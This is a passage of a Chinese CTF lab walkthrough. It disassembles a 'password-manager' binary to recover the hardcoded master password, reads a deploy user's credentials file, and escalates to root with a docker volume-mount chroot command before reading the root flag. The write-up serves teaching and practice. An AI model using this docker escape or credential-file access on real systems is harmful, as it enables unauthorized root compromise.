│           0x000012aa      488d45a0       lea rax, [var_60h]
│           0x000012ae      488d35aa0d00.  lea rsi, [0x0000205f]       ; u"ample"
│           0x000012b5      4889c7         mov rdi, rax
│           0x000012b8      e8b3fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012bd      488d45a0       lea rax, [var_60h]
│           0x000012c1      488d35990d00.  lea rsi, [0x00002061]       ; u"mple"
│           0x000012c8      4889c7         mov rdi, rax
│           0x000012cb      e8a0fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012d0      488d45a0       lea rax, [var_60h]
│           0x000012d4      488d35880d00.  lea rsi, [0x00002063]       ; u"ple"
│           0x000012db      4889c7         mov rdi, rax
│           0x000012de      e88dfdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012e3      488d45a0       lea rax, [var_60h]
│           0x000012e7      488d35770d00.  lea rsi, [0x00002065]       ; u"le"
│           0x000012ee      4889c7         mov rdi, rax
│           0x000012f1      e87afdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_                                                                                                                                                          
│           0x000012f6      488d45a0       lea rax, [var_60h]
│           0x000012fa      488d35660d00.  lea rsi, [0x00002067]       ; "e"
│           0x00001301      4889c7         mov rdi, rax
│           0x00001304      e867fdffff     call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_

接着,程序会和我们输入的字符串和 Sample 字符一个一个的做对比

0x00001325      488d35440d00.  lea rsi, str.Access_granted__Here_is_creds__ ; 0x2070 ; "Access granted! Here is creds !"
0x0000134d      488d3d3c0d00.  lea rdi, str.cat__home_deploy_creds.txt ; 0x2090 ; "cat /home/deploy/creds.txt" ; const char *string

我们输入的字符串是 Sample 后,会输出 "Access granted! Here is creds !" 字符串,表示我们输入正确,然后会执行一个系统命令 "cat /home/deploy/creds.txt",查看文件 /home/deploy/creds.txt 的内容。

现在我们回到靶机,来执行一下

[email protected]:/home/deploy$ sudo -u deploy ./password-manager
[sudo] password for jaeger: 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: [email protected]!

得到了一个账号密码,然后使用这个账号密码切换到用户 deploy

[email protected]:/home/deploy$ su deploy
Password: 
$ whoami&&id
deploy
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)

成功提权到 deploy 用户

Docker 越权

https://gtfobins.github.io/gtfobins/docker/

查询提权帮助

我们尝试一下是否可行

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh  
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

成功越权到 root 权限

# cat /root/root.txt
e95c041905b2bb2a8fcbb6d9327e9d64

成功拿到 root 权限的 flag 文件


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MjY5MzE5MA==&mid=2247488173&idx=1&sn=7b00251bf878a673f48d748e2f521f73&chksm=fc64c784cb134e924dade83c79a52cb67c3ac2b6a9f2e0e0e4f4dbe00741bfe70210b4409da4#rd
如有侵权请联系:admin#unsafe.sh